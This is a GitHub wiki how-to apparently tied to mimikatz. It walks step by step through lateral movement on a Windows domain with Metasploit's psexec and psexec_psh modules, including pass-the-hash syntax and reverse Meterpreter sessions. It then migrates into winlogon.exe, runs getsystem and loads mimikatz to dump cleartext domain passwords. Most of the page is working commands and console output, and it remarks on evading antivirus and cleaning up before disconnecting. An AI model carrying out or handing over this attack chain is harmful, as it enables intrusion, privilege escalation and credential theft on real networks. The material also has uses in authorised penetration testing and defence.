PSEXEC - TopazA/mimikatz GitHub Wiki

How to - Remote Execution Using Metasploit's PSEXEC Modules and Meterpreter...

Using metasploit PSEXEC/PSEXEC_PSH works great both when trying to 'Pass the hash' of a local admin account and when using credentials that have administrative access on the account.

To pass the hash, the format is:

msf exploit(psexec_psh) > set SMBPASS LM:NTLM

Where LM:NTLM is actually the hashes seperated by a ':'

Using Metasploit PSEXEC_PSH (PowerSHell)

  • PROS: Evades AV like a boss
  • CONS: May take several exploit attempts to execute successfully
  • CONS: Wont work on older machines that don't have powershell installed
  • CONS: May have multiple powershell processes running even if they don't all connect back (Kill before DCing)

root@Kali:~# msfconsole

msf > use exploit/windows/smb/psexec_psh

msf exploit(psexec_psh) > set RHOST 10.0.13.2

RHOST => 10.0.13.2

msf exploit(psexec_psh) > set SMBPASS P@ssw0rddddd!

SMBPASS => P@ssw0rddddd!

msf exploit(psexec_psh) > set SMBDomain company.domain

SMBDomain => company.domain

msf exploit(psexec_psh) > set SMBUSER admin

SMBUSER => admin

msf exploit(psexec_psh) > exploit

[*] Started reverse handler on 10.0.13.37:4444 
[*] 10.0.13.2:445 - Executing the payload...
[+] 10.0.13.2:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (882688 bytes) to 10.0.13.2
[*] Meterpreter session 1 opened (10.0.13.37:4444 -> 10.0.13.2:58202) at 2015-06-23 07:43:56 -0400

meterpreter >

Using Metasploit PSEXEC

  • PROS: Executes remotely as expected
  • CONS: AV's pick up the service fairly consistently, not very stealthy

root@Kali:~# msfconsole

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set RHOST 10.0.13.2

RHOST => 10.0.13.2

msf exploit(psexec) > set SMBPASS P@ssw0rddddd!

SMBPASS => P@ssw0rddddd!

msf exploit(psexec) > set SMBDomain company.domain

SMBDomain => company.domain

msf exploit(psexec) > set SMBUSER admin

SMBUSER => admin

msf exploit(psexec) > exploit

[*] Started reverse handler on 10.0.13.37:4444 
[*] Connecting to the server...
[*] Authenticating to 10.0.13.2:445|looptech as user 'taral'...
[*] Uploading payload...
[*] Created \MqsYjmoq.exe...
[+] 10.0.13.2:445 - Service started successfully...
[*] Deleting \MqsYjmoq.exe...
[*] Sending stage (882688 bytes) to 10.0.13.2
[*] Meterpreter session 2 opened (10.0.13.37:4444 -> 10.0.13.2:58206) at 2015-06-23 07:47:46 -0400

meterpreter >

Now that we are in meterpreter!

  1. We need to migrate into a suitable process to load mimikatz successfully
  2. So, List running processes and find a suitable System Process running as x86_64

meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch    Session     User                          Path
 ---   ----  ----                 ----    -------     ----                          ----
 0     0     [System Process]             4294967295                                
 4     0     System               x86_64  0                                         
 300   4     smss.exe             x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 312   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 388   380   csrss.exe            x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 396   876   dwm.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\dwm.exe
 432   380   wininit.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 440   424   csrss.exe            x86_64  1           NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 496   424   winlogon.exe         x86_64  1           NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 536   432   services.exe         x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 544   432   lsass.exe            x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 556   432   lsm.exe              x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 652   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 736   536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 832   536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 876   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 892   440   conhost.exe          x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\conhost.exe
 900   536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 924   536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1088  536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1188  536   spoolsv.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1216  536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1296  536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1376  536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1596  536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1632  536   svchost.exe          x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1692  440   conhost.exe          x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\conhost.exe
 1868  592   explorer.exe         x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\explorer.exe
 2116  536   dllhost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 2252  536   msdtc.exe            x86_64  0           NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2280  536   svchost.exe          x86_64  0           NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2504  536   svchost.exe          x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2628  536   SearchIndexer.exe    x86_64  0           NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
 2908  536   taskhost.exe         x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\taskhost.exe
 3324  1876  rundll32.exe         x86     0           NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\rundll32.exe
 3572  1868  mmc.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\mmc.exe
 3800  1868  cmd.exe              x86_64  1           COMPANY.DOMAIN\admin          C:\Windows\System32\cmd.exe

meterpreter > migrate 496

//Migrate into winlogon.exe

[*] Migrating from 3324 to 496...

[*] Migration completed successfully.

meterpreter > getsystem //Ensure you have system permissions...

...got system (via technique 1).

meterpreter > load mimikatz //Obviously load mimikatz extension on target system

Loading extension mimikatz...success.

meterpreter > mimikatz_command -f sekurlsa::searchPasswords //You can now run whatever mimikatz commands you'd like!

[0] { WIN-7$ ; COMPANY.DOMAIN ; 0d503978f393a94e05c2e0de8274936214c0d310afd9a202464e2f }

[1] { WIN-7$ ; COMPANY.DOMAIN ; 0d503978f393a94e05c2e0de8274936214c0d310afd9a202464e2f }

[2] { admin ; COMPANY.DOMAIN ; P@ssw0rddddd! }

[3] { admin ; COMPANY.DOMAIN ; P@ssw0rddddd! }